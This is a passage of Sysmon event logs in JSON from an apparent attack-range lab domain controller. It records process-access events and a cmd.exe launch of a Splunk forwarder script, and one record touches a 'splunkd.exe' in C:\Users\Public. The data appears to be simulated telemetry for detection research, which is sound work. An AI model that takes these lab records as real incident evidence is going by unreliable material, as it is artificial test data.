{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2119,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.568\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-0010F6830300}\r\nTargetProcessId: 4044\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.568","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010F6830300}","TargetProcessId":"4044","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2120,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.693\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.693","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2121,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.806\r\nProcessGuid: {E2A3D6B1-106F-5F25-0000-001002F80300}\r\nProcessId: 3856\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\MonitorNoHandle.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nParentProcessId: 2792\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.806","ProcessGuid":"{E2A3D6B1-106F-5F25-0000-001002F80300}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\MonitorNoHandle.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","ParentProcessId":"2792","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2122,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.802\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nSourceProcessId: 2792\r\nSourceThreadId: 3812\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-106F-5F25-0000-001002F80300}\r\nTargetProcessId: 3856\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.802","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","SourceProcessId":"2792","SourceThreadId":"3812","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-106F-5F25-0000-001002F80300}","TargetProcessId":"3856","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2123,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.802\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106F-5F25-0000-001002F80300}\r\nTargetProcessId: 3856\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.802","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106F-5F25-0000-001002F80300}","TargetProcessId":"3856","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2124,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.802\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.802","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2125,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.802\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.802","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2126,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.802\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.802","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2127,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.802\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 